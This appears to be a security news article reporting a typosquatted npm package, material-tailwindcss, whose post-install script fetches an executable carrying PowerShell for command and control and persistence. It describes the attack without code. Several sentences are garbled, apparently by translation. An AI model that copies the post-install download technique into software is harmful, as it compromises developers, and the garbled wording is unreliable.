A malicious NPM package has been discovered masquerading as a legitimate software library from Material Tailwind. This indicates an attacker’s attempt to distribute malicious code in an open source software repository.
Material Tailwind is a CSS-based framework advertised by its maintainers as “an easy-to-use component library for Tailwind CSS and Material Design”.
Karlo Zanki, a security researcher at ReversingLabs, said in a report published in The Hacker News:
This script is designed to download a password-protected ZIP archive file containing a Windows executable that can run PowerShell scripts.
The now-removed malicious package named material-tailwindcss has so far been downloaded 320 times, all since September 15, 2022.
In an increasingly common technique, attackers covertly leverage post-installation scripts to introduce malicious functionality, taking great care to mimic functionality provided by the original package. And it seems.
It takes the form of a ZIP file retrieved from a remote server with embedded Windows binaries, and is named “DiagnosticsHub.exe”, likely attempting to pass the payload as a diagnostic utility. there is.
|Code for stage 2 download|
Packed within the executable are Powershell code snippets responsible for command and control, communication, process manipulation, and establishing persistence through scheduled tasks.
The typosquatted Material Tailwind module is the latest in a long list of attacks targeting open source software repositories such as npm, PyPI, and RubyGems in recent years.
This attack also serves to highlight the software supply chain as an attack surface. This is because attackers can create cascading effects by distributing malicious code that wreaks havoc on multiple platforms and enterprise environments at once.
Supply chain threat prompts U.S. government to issue memo directing federal agencies to “use only software that complies with secure software development standards” and to obtain “self-certification of all third-party software” I came to
The White House said last week, “Ensuring software integrity is critical to protecting federal systems from threats and vulnerabilities and reducing overall risk from cyberattacks.